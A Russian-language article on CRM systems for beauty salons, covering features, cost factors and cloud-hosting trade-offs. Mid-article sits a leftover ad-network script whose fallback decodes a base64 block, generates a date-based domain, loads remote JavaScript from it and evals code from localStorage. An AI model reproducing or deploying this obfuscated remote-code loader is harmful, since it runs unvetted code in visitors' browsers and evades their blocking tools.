Салон красоты – это такой бизнес, при котором постоянно нужно поддерживать уровень качества и привлекать новых клиентов. Именно из-за этого многие специалисты рекомендуют внедрить CRM систему. С помощью данного инструмента получится вести подробный учет, рассматривать востребованность услуг на рынке и качество выполняемых работ сотрудниками. Также CRM поможет наладить контакт с действующими клиентами и привлечет новых.
Какие функции предоставляются
CRM для салона красоты обладает широким набором функций, который помогают сделать рабочий процесс проще и систематизированнее. Стоит разобраться с каждым пунктом более подробно.
Администрирование
Работа администраторов упрощается в несколько раз. Вести отчеты можно со смартфона, а вероятность ошибок снижается в несколько раз. Постоянно ведутся записи телефонных переговоров, что в будущем позволит улучшить качество услуг. Журнал ведения дел и расписание будут всегда доступны в режиме онлайн.
Автоматизация рабочих процессов
Автоматизированный процесс сможет освободить большое количество времени. Например, напоминания о посещении, а также рассылки об акциях и бонусах станут приходить к клиентам автоматически и без задержек.
Повышение доверия клиентов
В данном пункте стоит присмотреться к системе лояльности. Она внедряется для постоянных клиентов, которые чаще всего заказывают одни и те же услуги. Они будут приятно удивлены, когда специально для них введут скидки. Система лояльности – идеальный инструмент для удержания старых клиентов.
Анализ посетителей
Для каждого клиента создается отдельная карточка, в которую вносятся данные о посещении, время процедур и прочее. Все это будет сохранено в самой базе салона красоты. Владельцу бизнеса будет проще вести анализ уровня работников и их загруженность. Для систематизированного показа информации были внедрены удобные графики и таблицы. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
От чего зависит стоимость внедрения CRM
Цена зависит от следующих факторов:
количество предполагаемых правок в будущих работах;общее количество участников, которые будет взаимодействовать с системой на постоянной основе;возможность работы на разных типах устройств, включая смартфоны или Smart Tv;общее количество внедряемых инструментов;сложность визуальных элементов и дизайна в целом.
Это далеко не самый полный список. Все внедряемые функции обсуждаются с клиентом индивидуально.
Облачная CRM система
Такая система полностью функционирует через сеть Интернет. Данный хранятся под надежной защитой на сторонних серверах, к которым имеет доступ только владелец салона красоты. У такого способа имеются следующие преимущества:
Поддержка CRM 24 часа в сутки и 7 дней в неделю. Никаких плановых остановок для перезагрузки.Программное обеспечение обновляется самостоятельно по мере выхода новой версии.Доступ к системе есть из любой точки мира. Человеку всего лишь нужно интернет-соединение.Салону красоты не придется покупать и содержать отдельный сервер.
К сожалению, без минусов тоже не обошлось. Они выглядят следующим образом:
Вся важная информация хранится на чужом сервере, хоть к ней имеет доступ только владелец бизнеса. Некоторым людям такой вариант не подойдет.Если произошла поломка на сервере, то данные могут просматриваться тех. рабочими.За пользование есть абонентская плата, которую необходимо вносить каждый месяц.Облачное CRM обновляется в любое время, без ведома владельца салона красоты.
Человек может воспользоваться любой системой, которая наиболее удобна для него.
(adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/crm-sistema-dlya-salonov-krasoty-opisanie/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook